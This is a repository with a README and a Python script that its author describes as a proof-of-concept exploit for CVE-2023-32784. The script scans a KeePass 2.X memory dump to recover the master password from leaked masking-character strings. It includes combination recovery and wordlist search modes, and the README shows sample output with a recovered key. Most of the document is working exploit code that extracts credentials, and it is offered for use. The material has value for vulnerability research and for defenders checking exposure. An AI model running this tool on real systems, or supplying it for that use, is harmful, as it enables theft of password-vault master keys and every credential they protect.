├── assets
    ├── combos.png
    ├── skip.png
    ├── example.png
    ├── wordlist.png
    └── wordsearch.png
├── README.md
└── keepass_dump.py


/assets/combos.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/combos.png


--------------------------------------------------------------------------------
/assets/skip.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/skip.png


--------------------------------------------------------------------------------
/assets/example.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/example.png


--------------------------------------------------------------------------------
/assets/wordlist.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/wordlist.png


--------------------------------------------------------------------------------
/assets/wordsearch.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/wordsearch.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Keepass-Dumper
 2 | 
 3 | This is my PoC implementation for [CVE-2023-32784](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32784)
 4 | 
 5 | My version is a python port of [@vdohney's PoC](https://github.com/vdohney/keepass-password-dumper) along with a few changes and additional features.
 6 | 
 7 | ## Changes
 8 | 
 9 | #
10 | 
11 | One change, was to use known strings that can be found within the dump file in order to more accurately jump to the location of the masterkey characters. This results in less false positive characters and greatly reduces the amount of time it takes to scan the file. In the case the the strings aren't found in the dump file, the scan will start from the beginning. This option is enabled by default, but if you want to do a full scan instead, you can use `--full-scan`. For these instances, I've also added a `--skip` flag to help speed up the scan. This is done by offsetting the pointer to jump over the the next 1000 bytes as they typically just contain same character repeated multiple. For example, if the character `●e`, was found in the dump file, it would appear like the following:
12 | 
13 | ```
14 | ●e
15 | ●e
16 | ●e
17 | ●e
18 | ●e
19 | ●e
20 | ●e
21 | ●e
22 | ●e
23 | ●e
24 | ●●c
25 | ```
26 | 
27 | Using the `--skip` flag, it's possible to jump over these repeated bytes to help speed up the scan, although this isn't necessary when using the jump points.
28 | 
29 | ```
30 | [*] 15567777 | Found: ●e
31 | [*] 15568797 | Found: ●e
32 | [*] 15570355 | Found: ●●c
33 | [*] 15571375 | Found: ●●c
34 | [*] 15572925 | Found: ●●●r
35 | [*] 15573973 | Found: ●●●r
36 | ```
37 | 
38 | ![alt text](assets/skip.png)
39 | 
40 | ## Features
41 | 
42 | #
43 | 
44 | This version includes a recovery functionality which attempts to find any remaining unknown characters for the key. This is done by trying to locate the different posssible combinations of the characters found inside the dump, if a match is found, the remaining characters are pulled from the dump until the next nonascii character is found.
45 | 
46 | This works if the **full** plaintext password is stored within the dump file (this seems to happen when user displays the masterkey by deactivating hiding using asterisks).
47 | 
48 | You can enable this behavoir using the `--recover` flag.
49 | 
50 | ![alt text](assets/example.png)
51 | 
52 | #
53 | 
54 | You can also specify an ouput file using `-o` to export the different combinations found. Here you can see, even in the case where characters for another masterkey were found, along with the plaintext password not being stored in the dump, in the combo list we're still able to obtain **23/24** characters for the key in the final combination found below.
55 | 
56 | ![alt text](assets/combos.png)
57 | 
58 | In this case, the first entry also actually shows `4/5` characters for the second key, `ducks`, that was inside the dump as well, however it was paired together with the characters for the other key resulting in `ucks`|`tMasterPassword123!`. There seems to potentially be a workaround for this, however it's still a WIP.
59 | 
60 | #
61 | 
62 | I've also added the ability to search for potential passwords inside the dumpfile by providing a wordlist with `-w`. This flag will generate strings containing characters from the words found in the list to search for within the dump file. You can also specify padding for the strings created using the `-p` or `--padding` flags.
63 | 
64 | Example: `--padding 2` => ●●a | `--padding 3` => ●●●a
65 | 
66 | ![alt text](assets/wordlist.png)
67 | 
68 | For the example above, the password was stored in plaintext within the dump. So it was possible to match the string found to pull the additional characters. However, in the case that the plaintext password is not stored in plaintext within the dump, it's still possible to extracting the remaining the remaining characters:
69 | 
70 | ![alt text](assets/wordsearch.png)
71 | 
72 | In this case, even though it wasn't able to find a plaintext match in the dump, it was still able to extract all the additional characters.
73 | 
74 | ## References
75 | 
76 | #
77 | 
78 | Credit to [@vdohney](https://github.com/vdohney) who originally discovered this vulnerability Link to their project is [here](https://github.com/vdohney/keepass-password-dumper)
79 | 
80 | CVE details: [CVE-2023-32784](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32784)
81 | 


--------------------------------------------------------------------------------
/keepass_dump.py:
--------------------------------------------------------------------------------
  1 | import argparse
  2 | from collections import deque, OrderedDict
  3 | 
  4 | 
  5 | def get_args():
  6 |     parser = argparse.ArgumentParser(
  7 |         description="Tool for extracting masterkey from a KeePass 2.X dump. (CVE-2023-32784)"
  8 |     )
  9 |     parser.add_argument(
 10 |         "--recover",
 11 |         action="store_true",
 12 |         default=False,
 13 |         help="Attempts to recover any remaining unknown characters using combinations of the found characters",
 14 |     )
 15 |     parser.add_argument(
 16 |         "-f", "--file", required=True, help="Path to the KeePass 2.X dump file"
 17 |     )
 18 |     parser.add_argument("-w", "--wordlist", help="Scan the dumpfile against a wordlist")
 19 |     parser.add_argument(
 20 |         "--skip",
 21 |         default=False,
 22 |         action="store_true",
 23 |         help="Attempt to jump to the next ● character (Useful for large files but may miss characters)",
 24 |     )
 25 |     parser.add_argument(
 26 |         "--set-skip",
 27 |         type=int,
 28 |         help="Change the number of bytes to skip when using --skip (default: 999 is when using --skip)",
 29 |     )
 30 |     parser.add_argument(
 31 |         "--full-scan",
 32 |         action="store_true",
 33 |         default=False,
 34 |         help="Full dump scan (slower but may find more characters)",
 35 |     )
 36 | 
 37 |     parser.add_argument(
 38 |         "-p",
 39 |         "--padding",
 40 |         default=0,
 41 |         type=int,
 42 |         help="Padding for wordlist search. (Ex: --padding 2 => ●●a | -- padding 3 => ●●●a)",
 43 |     )
 44 | 
 45 |     parser.add_argument(
 46 |         "-o", "--output", help="Output file to write masterkey combinations to"
 47 |     )
 48 |     parser.add_argument(
 49 |         "--debug", action="store_true", default=False, help="Print debug information"
 50 |     )
 51 |     return parser.parse_args()
 52 | 
 53 | 
 54 | class KeePassDump:
 55 |     def __init__(self, args):
 56 |         self.args = args
 57 |         with open(args.file, "rb") as f:
 58 |             self.mem_dump = f.read()
 59 |             self.size = len(self.mem_dump)
 60 | 
 61 |         self.combinations = deque()
 62 |         self.found = OrderedDict()
 63 |         if args.skip:
 64 |             print("[*] Skipping bytes")
 65 |             if args.set_skip:
 66 |                 self._skip = args.set_skip
 67 |             else:
 68 |                 self._skip = 999
 69 |         else:
 70 |             self._skip = 0
 71 | 
 72 |     def DumpPasswords(self):
 73 |         print("[*] Searching for masterkey characters")
 74 |         chars = self.dump_pw_chars()
 75 |         if chars:
 76 |             print(f"[*] Extracted: {{UNKNOWN}}{chars}")
 77 |             if self.args.recover:
 78 |                 combos = get_word_combinations(chars, deque())
 79 |                 for c in combos:
 80 |                     masterKey, found = self.recover(c)
 81 |                     if found:
 82 |                         print(f"[+] masterKey: {masterKey}")
 83 |                 if self.args.output:
 84 |                     with open(self.args.output, "w") as f:
 85 |                         f.write("\n".join(combos) + "\n")
 86 |                     print(f"[*] Saved {len(combos)} combinations to {self.args.output}")
 87 |             return
 88 |         else:
 89 |             print("[-] couldn't find any characters")
 90 | 
 91 |     def WordSearch(self):
 92 |         print(f"[*] Searching for masterkey using {self.args.wordlist}")
 93 |         wordlist = build_wordlist(self.args)
 94 |         searchResults = self.search_dump(wordlist)
 95 |         if searchResults:
 96 |             [print(f"[+] masterKey: {x}") for x in searchResults]
 97 | 
 98 |     def dump_pw_chars(self) -> str:
 99 |         current_len = 0
100 |         dbg_str = deque()
101 |         found = OrderedDict()
102 |         if self.args.full_scan:
103 |             print(f"[*] Full scan... This may take a few seconds.")
104 |             return self._full_scan(current_len, dbg_str, found)
105 |         else:
106 |             idx, endSearch = self.__get_jump_points()
107 | 
108 |         mem = self.mem_dump
109 |         since_last_char = 0
110 |         while idx < endSearch:
111 |             # stop searching if we haven't found anything else to reduce false positives
112 |             if found and since_last_char > 10000000:
113 |                 if self.args.debug:
114 |                     print("[*] 10000000 bytes since last found. Ending scan.")
115 |                 break
116 |             if isAsterisk(mem[idx], mem[idx + 1]):
117 |                 current_len += 1
118 |                 dbg_str.append("●")
119 |                 idx += 1
120 |             elif current_len != 0:
121 |                 if isAscii(mem, idx):
122 |                     if current_len not in found:
123 |                         found[current_len] = bytes([mem[idx]])
124 |                     elif mem[idx] not in found[current_len]:
125 |                         found[current_len] += bytes([mem[idx]])
126 | 
127 |                     if self.args.debug:
128 |                         print(
129 |                             f"[*] {idx} | Found: {''.join(dbg_str)}{bytes([mem[idx]]).decode()}"
130 |                         )
131 |                     since_last_char = 0
132 |                     idx += self._skip
133 |                 current_len = 0
134 |                 dbg_str.clear()
135 |             idx += 1
136 |             since_last_char += 1
137 |         return self.display(found)
138 | 
139 |     def _full_scan(self, current_len, dbg_str, found):
140 |         current_len = 0
141 |         dbg_str = deque()
142 |         found = OrderedDict()
143 | 
144 |         idx, endSearch = 0, self.size
145 | 
146 |         mem = self.mem_dump
147 |         while idx < endSearch:
148 |             if isAsterisk(mem[idx], mem[idx + 1]):
149 |                 current_len += 1
150 |                 dbg_str.append("●")
151 |                 idx += 1
152 |             elif current_len != 0:
153 |                 if isAscii(mem, idx):
154 |                     if current_len not in found:
155 |                         found[current_len] = bytes([mem[idx]])
156 |                     elif mem[idx] not in found[current_len]:
157 |                         found[current_len] += bytes([mem[idx]])
158 | 
159 |                     if self.args.debug:
160 |                         print(
161 |                             f"[*] {idx} | Found: {''.join(dbg_str)}{bytes([mem[idx]]).decode()}"
162 |                         )
163 |                     since_last_char = 0
164 |                     idx += self._skip
165 |                 current_len = 0
166 |                 dbg_str.clear()
167 |             idx += 1
168 |         return self.display(found)
169 | 
170 |     def display(self, found: OrderedDict) -> str:
171 |         chars = []
172 |         print("[*] 0:\t{UNKNOWN}")
173 |         for key, val in found.items():
174 |             print(f"[*] {key}:", end="\t")
175 |             if len(val) > 1:
176 |                 candidates = b"<{" + b", ".join([c.to_bytes() for c in val]) + b"}>"
177 |             else:
178 |                 candidates = val
179 |             data = candidates.decode()
180 |             print(data)
181 |             chars.append(data)
182 |         return "".join(chars)
183 | 
184 |     def recover(self, search_word: str, collected=[]) -> tuple[bool, str]:
185 |         print("[?] Recovering...")
186 | 
187 |         if not collected:
188 |             collected = deque([c for c in search_word])
189 | 
190 |         key, success = self.extract_and_search(search_word, collected)
191 |         if success:
192 |             return key, success
193 | 
194 |         return False, ""
195 | 
196 |     def extract_and_search(self, char: str, collected_key_chars: deque):
197 |         idx = self.mem_dump.find(char.encode())
198 |         if idx != -1:
199 |             print(f"[*] Found match in dump for: {char}")
200 |             key, found_ct = self.__extract_chars(idx, len(char), collected_key_chars)
201 |             if found_ct != 0 and self.mem_dump.find(key.encode()) != -1:
202 |                 return key, True
203 |             return "", False
204 |         print(f"[-] Couldn't verify plaintext match in dump for: {char}")
205 |         return "", False
206 | 
207 |     def search_dump(self, wordlist: dict[str, deque]) -> tuple[bool, str]:
208 |         results = {}
209 | 
210 |         for idx, (word, patterns) in enumerate(wordlist.items()):
211 |             print(f"[*] ({idx + 1}/{len(wordlist.keys())}): {word}")
212 |             collected, success = self._pattern_search(patterns.copy())
213 |             if success:
214 |                 char = "".join(collected).replace("●", "")
215 |                 print(f"[*] Found string: {char}")
216 |                 key, success = self.recover(char, collected)
217 |                 if success:
218 |                     results[word] = key
219 |             else:
220 |                 print(f"[-] no matches found for: {word}")
221 | 
222 |         return list(set(results.values()))
223 | 
224 |     def _char_search_left(self, patterns: deque, collected: OrderedDict) -> deque:
225 |         if not patterns:
226 |             return deque(sorted(set(collected.values())))
227 | 
228 |         target_char = patterns.pop()
229 |         target_idx = self.mem_dump.find(target_char.encode("utf-16-le"))
230 | 
231 |         if target_idx != -1:
232 |             collected[target_idx] = target_char
233 |             if self.args.debug:
234 |                 print(f"[*] Match for: {target_char}")
235 |             if target_idx - 2600 > 0:
236 |                 mem = self.mem_dump
237 |                 dbg_str = deque(maxlen=100)
238 |                 for i in range(1, 2500):
239 |                     idx = target_idx - 2500 - i
240 |                     if isAscii(mem, idx):
241 |                         for y in range(1, 99, 2):
242 |                             if isAsterisk(mem[idx - y - 1], mem[idx - y]):
243 |                                 dbg_str.append("●")
244 |                             elif dbg_str:
245 |                                 char = mem[idx : idx + 1].decode()
246 |                                 self.__search_callback(
247 |                                     idx, char, dbg_str, collected, patterns
248 |                                 )
249 |                                 break
250 |                         dbg_str.clear()
251 |         return self._char_search_left(patterns, collected)
252 | 
253 |     def _char_search_right(self, patterns: deque, collected: OrderedDict) -> deque:
254 |         if not patterns:
255 |             return deque(sorted(set(collected.values())))
256 | 
257 |         target_char = patterns.popleft()
258 |         target_idx = self.mem_dump.find(target_char.encode("utf-16-le"))
259 |         mem = self.mem_dump
260 | 
261 |         if target_idx != -1:
262 |             collected[target_idx] = target_char
263 |             if self.args.debug:
264 |                 print(f"[*] Match for: {target_char}")
265 |             if target_idx - 2600 > 0:
266 |                 mem = self.mem_dump
267 |                 dbg_str = deque(maxlen=100)
268 |                 for i in range(1, 2500):
269 |                     idx = target_idx + 2500 + i
270 |                     if isAsterisk(mem[idx + 1], mem[idx + i + 1]):
271 |                         dbg_str.append("●" * len(target_char))
272 |                     if dbg_str:
273 |                         for y in range(1, 99, 2):
274 |                             if isAscii(mem, idx + y):
275 |                                 char = mem[idx + y : idx + y + 1].decode()
276 |                                 self.__search_callback(
277 |                                     idx, char, dbg_str, collected, patterns
278 |                                 )
279 |                                 break
280 |                         break
281 |         return self._char_search_right(patterns, collected)
282 | 
283 |     def _pattern_search(self, patterns: deque):
284 |         collected = deque()
285 |         # copy we can use the original pattern in both searches
286 |         _left_chars = self._char_search_left(patterns.copy(), OrderedDict())
287 |         _right_chars = self._char_search_right(patterns.copy(), OrderedDict())
288 | 
289 |         if not _left_chars and not _right_chars:
290 |             return collected, False
291 | 
292 |         # merge collected characters
293 |         for i in range(len(_left_chars)):
294 |             if _left_chars[i] not in _right_chars:
295 |                 _right_chars.insert(i, _left_chars[i])
296 | 
297 |         collected.extend(_right_chars)
298 |         return collected, True
299 | 
300 |     def __search_callback(self, idx, char, dbg_str, collected, patterns):
301 |         dbg_str = f'{"".join(dbg_str)}{char}'
302 |         if dbg_str not in collected.values():
303 |             collected[idx] = dbg_str
304 |             if dbg_str not in patterns:
305 |                 if self.args.debug:
306 |                     print(f"[*] Match for: {char}")
307 |                 patterns.append(dbg_str)
308 | 
309 |     def __extract_chars(self, start: int, chars_len: int, collected) -> str:
310 |         """Extracts the remaining characters of the masterkey from the dump if they're stored in plaintext by being displayed within the application"""
311 |         print("[*] Extracted chars:", end="\t")
312 |         mem = self.mem_dump
313 | 
314 |         init_len = len(collected)
315 |         last_len = init_len
316 | 
317 |         for i in range(1, 99 - chars_len):  # 99 => max length for masterkey
318 |             if not 0x20 <= mem[start - i] <= 0x7E:
319 |                 break
320 |             collected.appendleft(mem[start - i].to_bytes().decode())
321 | 
322 |         print("{ ", end="")
323 | 
324 |         if len(collected) == last_len:
325 |             print("(none)", end="")
326 |         else:
327 |             [print(collected[x], end="") for x in range(len(collected) - last_len)]
328 | 
329 |         print(" <- -> ", end="")
330 | 
331 |         last_len = len(collected)
332 | 
333 |         for i in range(99 - chars_len):
334 |             if not 0x20 <= mem[start + chars_len + i] <= 0x7E:
335 |                 if len(collected) == last_len:
336 |                     print("(none)", end="")
337 |                 break
338 |             char = mem[start + chars_len + i].to_bytes().decode()
339 |             print(char, end="")
340 |             collected.append(char)
341 | 
342 |         print(" }")
343 | 
344 |         if len(collected) == init_len:
345 |             print("[-] No new chars found")
346 |             return "".join(collected).replace("●", ""), 0
347 | 
348 |         return "".join(collected).replace("●", ""), len(collected) - init_len
349 | 
350 |     def __get_jump_points(self) -> tuple[int, int]:
351 |         try:
352 |             i = self.mem_dump.index(b"(Multiple values)")
353 |             endSearch = self.mem_dump.rindex(b"(Multiple values)")
354 |             if i != endSearch:
355 |                 print("[*] Using jump points")
356 |                 return i, endSearch
357 |             print("Only one jump point found. Scanning with slower method.")
358 |             return 0, len(self.mem_dump) - 1
359 |         except:
360 |             print("[-] Couldn't find jump points in file. Scanning with slower method.")
361 |             return 0, len(self.mem_dump) - 1
362 | 
363 | 
364 | def isAscii(mem_dump, idx) -> bool:
365 |     return 0x20 <= mem_dump[idx] and mem_dump[idx] <= 0x7E and mem_dump[idx + 1] == 0x00
366 | 
367 | 
368 | def isAsterisk(x, y) -> bool:
369 |     return x == 0xCF and y == 0x25
370 | 
371 | 
372 | def get_word_combinations(chars, combinations, current="") -> deque:
373 |     if not chars:
374 |         combinations.append(current)
375 |         return
376 | 
377 |     if chars.startswith("<{") and "}>" in chars:
378 |         opening_idx = chars.index("<{")
379 |         closing_idx = chars.index("}>")
380 |         options = chars[opening_idx + 2 : closing_idx].split(", ")
381 |         for option in options:
382 |             get_word_combinations(
383 |                 chars[closing_idx + 2 :], combinations, current + option
384 |             )
385 |     else:
386 |         get_word_combinations(chars[1:], combinations, current + chars[0])
387 | 
388 |     return combinations
389 | 
390 | 
391 | def build_wordlist(args) -> dict[str, deque]:
392 |     with open(args.wordlist, "r") as f:
393 |         wordlist = [line.strip() for line in f.readlines()]
394 | 
395 |     candidates: dict[str, deque] = {}
396 | 
397 |     for word in wordlist:
398 |         candidates[word] = deque(
399 |             [f"{'●' * (x + args.padding)}{word[x]}" for x in range(len(word))]
400 |         )
401 |     return candidates
402 | 
403 | 
404 | def main(args):
405 |     kpd = KeePassDump(args)
406 | 
407 |     if args.wordlist:
408 |         kpd.WordSearch()
409 |     else:
410 |         kpd.DumpPasswords()
411 | 
412 | 
413 | if __name__ == "__main__":
414 |     main(get_args())
415 | 


--------------------------------------------------------------------------------